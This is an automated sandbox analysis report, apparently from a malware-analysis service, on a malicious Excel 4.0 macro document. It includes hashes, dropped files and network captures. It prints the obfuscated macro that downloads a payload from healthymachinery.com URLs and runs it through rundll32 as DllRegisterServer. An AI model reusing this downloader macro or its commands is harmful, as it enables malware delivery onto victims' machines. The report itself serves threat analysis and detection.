                  MD5:5DBCC3E3BA539EAC9E456E71F44E7F4C
                  SHA1:26A9F73B250A22119F585C58096C6DC174B354BD
                  SHA-256:05CEF3F9B120D1E67A3F7A67F8578A2EE56E1060EAC5FFDF8F572BB4834127B7
                  SHA-512:48814DA9A0B6A1A2EFEF65B0FA6617508E2514227CC48B215F3716412375C072A8FD97C3A9EC54463E3A4DAAE0CA9BC26D4D5686D5DEED9F6CAF12B63F7D54C4
                  Malicious:false
                  Reputation:low
                  Preview: Desktop.LNK=0..[xls]..Document1094680387_02012021.LNK=0..Document1094680387_02012021.LNK=0..[xls]..Document1094680387_02012021.LNK=0..
                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\LI22RCU4.txt
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:ASCII text
                  Category:downloaded
                  Size (bytes):122
                  Entropy (8bit):4.5618514532497425
                  Encrypted:false
                  SSDEEP:3:GmM/5DyQiqWyD0XQvHU8VXT7OHHRESNSRcuRYigjmXReWpD:XM/5DD1D3JuHS3cuKjmUWpD
                  MD5:D84B2823208AF224D4942EC7FD77CBBF
                  SHA1:8D9C717B32324F197502E20EFBB1C3763DADF579
                  SHA-256:DECCE67F750C39C9B6D2E721D97DA196327CF7DFA3EFF790508D756D969F7739
                  SHA-512:51CA3F9B77C8B41E2EAAACCE191D11AA08663F7C208A56B55D998FCA9B9B4BD28C457F9BEBD6112272D17A9682C8C19A2257E3E3646613B1912333D88FA6BBEB
                  Malicious:false
                  Reputation:low
                  IE Cache URL:healthymachinery.com/
                  Preview: __cfduid.de9fb75c2785608345f9f59dfba82579b1614026581.healthymachinery.com/.9728.1204975744.30875886.2966600249.30869926.*.
                  C:\Users\user\Desktop\76CE0000
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Applesoft BASIC program data, first line number 16
                  Category:dropped
                  Size (bytes):69069
                  Entropy (8bit):6.230482106115366
                  Encrypted:false
                  SSDEEP:1536:nZ8rmjAItyzElBIL6lECbgBGGP5xLmQWVxdEfq6PkHZ8rmjAItyzElBIL6lECbgT:nZ8rmjAItyzElBIL6lECbgBGGP5xLm7W
                  MD5:7C0537F4EBF1358F614989AABC178980
                  SHA1:0376B456E68893C84F61273EF06BC7D12FE22ED8
                  SHA-256:0DB14CEF15D668DC42C8AD731EB42B0CDCB21E33D3D3C1AFA9010805EB725F9A
                  SHA-512:38D05E80CCDA7B63F291E068291430D9F9B2E0EDDD440ACD0C9E461A88E10BE894C17E786EC793CE2113BCA9778E6B26F0BAD2C59E9D826C6A354483AF823F4C
                  Malicious:false
                  Reputation:low
                  Preview: ........g2..........................\.p....user B.....a.........=.............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.............
                  C:\Users\user\MORI.BAST
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:HTML document, ASCII text
                  Category:dropped
                  Size (bytes):4318
                  Entropy (8bit):4.978706497143023
                  Encrypted:false
                  SSDEEP:96:1j9jwIjYjyDK/DZD8jH+k1fiPvJADh/pRscs1szbGD:1j9jhjYjWK/lyH+k0RADh/pmcs1sfGD
                  MD5:2885250688BD4C1C1BB0ABE37E258DDC
                  SHA1:A0C1355880E29CA2B53A875CB3C296FA6E7EA829
                  SHA-256:BE620E05FC49EFF7529785A5D8B96E40B9F1668BBC80B7C33EC46453DEBB3AE4
                  SHA-512:BD118277C49F05C733EEBD7F674877749639EC64D9C55ADAA72E3DDFB669EECF83F8D9238C53F7C92FF9702D5C8218F3799335E6FBDE36BE964B0AA243E97364
                  Malicious:false
                  Reputation:low
                  Preview: <!DOCTYPE html>. [if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->. [if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->. [if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->. [if gt IE 8]> > <html class="no-js" lang="en-US"> <![endif]-->.<head>.<title>Suspected phishing site | Cloudflare</title>.<meta charset="UTF-8" />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<meta name="robots" content="noindex, nofollow" />.<meta name="viewport" content="width=device-width,initial-scale=1" />.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />. [if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->.<style type="text/css">body{margin:0;padding:0}</style>...

                  Static File Info

                  General

                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Last Saved By: Friner, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Feb 1 14:40:50 2021, Security: 0
                  Entropy (8bit):3.9082210251254503
                  TrID:
                  • Microsoft Excel sheet (30009/1) 78.94%
                  • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                  File name:Document1094680387_02012021.xls
                  File size:64512
                  MD5:9423ee9775707d51960e0eac95b3f6cc
                  SHA1:debc0defc997fde77a2f0cee9b3b1fcbed54ea91
                  SHA256:7034e21128da9ce58c2d5249d3fd73dd766cf90437fa52f79faa50098f359634
                  SHA512:0cff3519c5453bdeb13201849c571cbb142ed6780c2e6cae572104904af1190ff4d4e068ff0109953745b153fc219c618519318cadd4dcac300b3d280643bc53
                  SSDEEP:1536:TcPiTQAVW/89BQnmlcGvgZ6GrvhpJ8YUOMUt/BI/s/Vk/OZ/R/7/Gm/UQ/OhGW/x:TcPiTQAVW/89BQnmlcGvgZ6Gr3J8YUOA
                  File Content Preview:........................>.......................|...........................{..................................................................................................................................................................................

                  File Icon

                  Icon Hash:e4eea286a4b4bcb4

                  Static OLE Info

                  General

                  Document Type:OLE
                  Number of OLE Files:1

                  OLE File "Document1094680387_02012021.xls"

                  Indicators

                  Has Summary Info:True
                  Application Name:Microsoft Excel
                  Encrypted Document:False
                  Contains Word Document Stream:False
                  Contains Workbook/Book Stream:True
                  Contains PowerPoint Document Stream:False
                  Contains Visio Document Stream:False
                  Contains ObjectPool Stream:
                  Flash Objects Count:
                  Contains VBA Macros:False

                  Summary

                  Code Page:1251
                  Author:
                  Last Saved By:Friner
                  Create Time:2006-09-16 00:00:00
                  Last Saved Time:2021-02-01 14:40:50
                  Creating Application:Microsoft Excel
                  Security:0

                  Document Summary

                  Document Code Page:1251
                  Thumbnail Scaling Desired:False
                  Contains Dirty Links:False

                  Streams

                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                  General
                  Stream Path:\x5DocumentSummaryInformation
                  File Type:data
                  Stream Size:4096
                  Entropy:0.292801571342
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . B a s e . . . . . K l o p s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b0 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 70 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 03 00 00 00
                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                  General
                  Stream Path:\x5SummaryInformation
                  File Type:data
                  Stream Size:4096
                  Entropy:0.271885406754
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . d . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F r i n e r . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 9c 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 64 00 00 00 0c 00 00 00 7c 00 00 00 0d 00 00 00 88 00 00 00 13 00 00 00 94 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                  Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 54588
                  General
                  Stream Path:Book
                  File Type:Applesoft BASIC program data, first line number 8
                  Stream Size:54588
                  Entropy:4.12824675227
                  Base64 Encoded:True
                  Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . Y u Z h o u L e e B . . . . . . . . . . . . . . . . . . . . . . . K l o p s . . . . . . . . . . . . . . . . . . N i o k a s e r . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  Data Raw:09 08 08 00 00 05 05 00 16 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 0b 59 75 20 5a 68 6f 75 20 4c 65 65 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                  Macro 4.0 Code

                  ,,,,,,,,,,"=EXEC(""r""&Base!V56&"" ""&Base!V55&"",D""&Base!V57)",,"=REGISTER(Base!W51&Base!W52&Base!W53&Base!W54&Base!W55&Base!W56,Base!X50&Base!X51&Base!X52&Base!X53&Base!X54&Base!X55&Base!X56&Base!X57&Base!X58&Base!X59&Base!X60&Base!X61&Base!X62&Base!X63&Base!X64&Base!X65&Base!X66&Base!X67,Base!W59&Base!W60&Base!W61&Base!W62&Base!W63&Base!W64,Base!W66,,1,9)"=C153(),,,"=Niokaser(0,""h""&Base!V54&C166&B170,Base!V55,0,0)",,,"=Niokaser(0,Base!V54&C167&B170,Base!V55&""1"",0,0)",,,"=Niokaser(0,Base!V54&C168&B170,Base!V55&""2"",0,0)",,,"=Niokaser(0,Base!V54&C169&B170,Base!V55&""3"",0,0)",,,"=Niokaser(0,Base!V54&C170&B170,Base!V55&""4"",0,0)",,,,,,,,,,,,,,,,=HALT(),=GOTO(D153),=GOTO(B153),,,,,healthymachinery.com/health/32-422-76.assp,,,healthymachinery.com/health/56754.fdre,,,healthymachinery.com/health/56754.fdre,,,healthymachinery.com/health/56754.fdre,,,healthymachinery.com/health/56754.fdre,

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Feb 22, 2021 21:43:00.961786985 CET4916580192.168.2.22172.67.149.197
                  Feb 22, 2021 21:43:01.016254902 CET8049165172.67.149.197192.168.2.22
                  Feb 22, 2021 21:43:01.016521931 CET4916580192.168.2.22172.67.149.197
                  Feb 22, 2021 21:43:01.017865896 CET4916580192.168.2.22172.67.149.197
                  Feb 22, 2021 21:43:01.071145058 CET8049165172.67.149.197192.168.2.22
                  Feb 22, 2021 21:43:01.097974062 CET8049165172.67.149.197192.168.2.22
                  Feb 22, 2021 21:43:01.098009109 CET8049165172.67.149.197192.168.2.22
                  Feb 22, 2021 21:43:01.098030090 CET8049165172.67.149.197192.168.2.22
                  Feb 22, 2021 21:43:01.098244905 CET4916580192.168.2.22172.67.149.197
                  Feb 22, 2021 21:45:00.816421986 CET4916580192.168.2.22172.67.149.197
                  Feb 22, 2021 21:45:00.870547056 CET8049165172.67.149.197192.168.2.22
                  Feb 22, 2021 21:45:00.870827913 CET4916580192.168.2.22172.67.149.197

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Feb 22, 2021 21:43:00.876825094 CET5219753192.168.2.228.8.8.8
                  Feb 22, 2021 21:43:00.938873053 CET53521978.8.8.8192.168.2.22

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                  Feb 22, 2021 21:43:00.876825094 CET192.168.2.228.8.8.80x78b6Standard query (0)healthymachinery.comA (IP address)IN (0x0001)

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                  Feb 22, 2021 21:43:00.938873053 CET8.8.8.8192.168.2.220x78b6No error (0)healthymachinery.com172.67.149.197A (IP address)IN (0x0001)
                  Feb 22, 2021 21:43:00.938873053 CET8.8.8.8192.168.2.220x78b6No error (0)healthymachinery.com104.21.29.200A (IP address)IN (0x0001)

                  HTTP Request Dependency Graph

                  • healthymachinery.com

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.2249165172.67.149.19780C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  TimestampkBytes transferredDirectionData
                  Feb 22, 2021 21:43:01.017865896 CET0OUTGET /health/32-422-76.assp HTTP/1.1
                  Accept: */*
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: healthymachinery.com
                  Connection: Keep-Alive
                  Feb 22, 2021 21:43:01.097974062 CET2INHTTP/1.1 200 OK
                  Date: Mon, 22 Feb 2021 20:43:01 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Set-Cookie: __cfduid=de9fb75c2785608345f9f59dfba82579b1614026581; expires=Wed, 24-Mar-21 20:43:01 GMT; path=/; domain=.healthymachinery.com; HttpOnly; SameSite=Lax
                  X-Frame-Options: SAMEORIGIN
                  cf-request-id: 086d143c3f00001f9587989000000001
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=%2F1IeoWu4yMF7YxBsX4mWYjb9uhQEB%2FOrGx2og24T%2FzojULsSOm0MRmBzJpJnKnDLzYn%2BEllsKLCbW7cGR2ffJU67A%2BIZtqMPV7wV5GU%2F%2FtxSabznfQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"max_age":604800,"report_to":"cf-nel"}
                  Server: cloudflare
                  CF-RAY: 625b897398321f95-AMS
                  Content-Encoding: gzip
                  Data Raw: 36 64 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c5 58 61 6f db 38 12 fd ee 5f 31 d1 01 9b 16 08 25 db 89 1b 27 91 b5 d8 6d b3 8b 00 7b d8 e0 9a a2 b7 58 14 01 25 8e 24 36 14 a9 92 94 1d a3 d7 ff 7e 20 45 3b b2 93 74 37 f7 e5 80 00 11 c9 e1 e3 cc f0 cd 23 e9 f4 e0 dd ef 6f 6f fe b8 be 84 da 36 22 1b a5 07 84 fc c9 4b 10 16 ae 2e e1 f4 53 06 a9 1b 80 42 50 63 16 91 54 e4 b3 01 8e 6f 40 09 c6 31 02 41 65 b5 88 50 92 0f ef a3 0c d2 83 3f 51 32 5e 7e 22 e4 01 2a e0 00 3c 0d 75 fa 32 a8 f9 77 a0 e6 2f 80 aa 6c 40 73 1d 4f 45 f9 18 85 90 5d a4 1a 29 cb 46 a9 e5 56 60 f6 be 33 2d 16 16 19 b4 35 37 35 97 15 18 6e 11 fe 03 6f 85 ea 58 29 a8 c6 34 e9 6d 47 69 83 96 42 51 53 6d d0 2e a2 0f 37 bf 90 79 04 c9 66 a0 b6 b6 25 f8 a5 e3 cb 45 f4 56 49 8b d2 92 9b 75 8b 11 14 7d 6b 11 59 bc b7 89 f3 f9 62 0b f3 3d 94 7f 93 0f 3f 91 b7 aa 69 a9 e5 b9 18 02 5d 5d 2e 2e 59 85 47 45 ad 55 83 8b c9 00 40 d2 06 17 91 56 b9 b2 66 30 43 2a 2e 19 de 1f 81 54 a5 12 42 ad 1e 4d 59 72 5c b5 4a db c1 a4 15 67 b6 5e 30 5c f2 02 89 6f 1c 71 c9 2d a7 82 98 82 8a ed c2 82 cb 3b d0 28 16 91 b1 6b 81 a6 46 b4 11 70 b6 88 8a f2 b6 ef 22 85 31 11 d4 1a cb 45 94 14 4c 92 a2 e2 49 3f 94 14 65 8c 5a 2b 6d 62 6f 64 d7 2d 86 5c f9 76 83 8c d3 45 64 0a 8d 28 8f 5a ad 3e 63 61 b9 92 fd da 3b d4 3f fb 94 3d ef cc e1 83 33 1c 9d 3f 87 7f e9 0f c7 97 bb b4 4b 37 0f b9 3f 3f cb 15 5b 7f 6d a8 ae b8 3c 1f 5f b4 94 31 2e ab f3 f1 b7 b4 77 21 1b 8d 06 94 47 17 d9 64 1c 48 3f 4a 4d a1 79 6b b3 11 00 2f e1 d5 81 a4 4b 5e 51 ab 74 5c 28 75 c7 f1 52 d2 5c 20 7b 0d 5f 47 ae e6 56 5c 32 b5 8a 29 63 97 4b 94 f6 37 6e 2c 4a d4 af 0e df fd fe cf 40 d3 df 14 65 c8 0e 8f a0 ec a4 0f 03 5e 6d 66 03 2c a9 86 00 2c 60 01 4c 15 5d 83 d2 c6 15 da 4b 81 ee f3 e7 f5 15 7b 75 d8 db
                  Data Ascii: 6d3Xao8_1%'m{X%$6~ E;t7#oo6"K.SBPcTo@1AeP?Q2^~"*<u2w/l@sOE])FV`3-575noX)4mGiBQSm.7yf%EVIu}kYb=?i]]..YGEU@Vf0C*.TBMYr\Jg^0\oq-;(kFp"1ELI?eZ+mbod-\vEd(Z>ca;?=3?K7??[m<_1.w!GdH?JMyk/K^Qt\(uR\ {_GV\2)cK7n,J@e^mf,,`L]K{u


                  Code Manipulations

                  Statistics

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Start time:21:42:33
                  Start date:22/02/2021
                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  Wow64 process (32bit):false
                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                  Imagebase:0x13f970000
                  File size:27641504 bytes
                  MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:21:42:36
                  Start date:22/02/2021
                  Path:C:\Windows\System32\rundll32.exe
                  Wow64 process (32bit):false
                  Commandline:rundll32 ..\MORI.BAST,DllRegisterServer
                  Imagebase:0xff790000
                  File size:45568 bytes
                  MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Disassembly

                  Code Analysis

                  Reset < >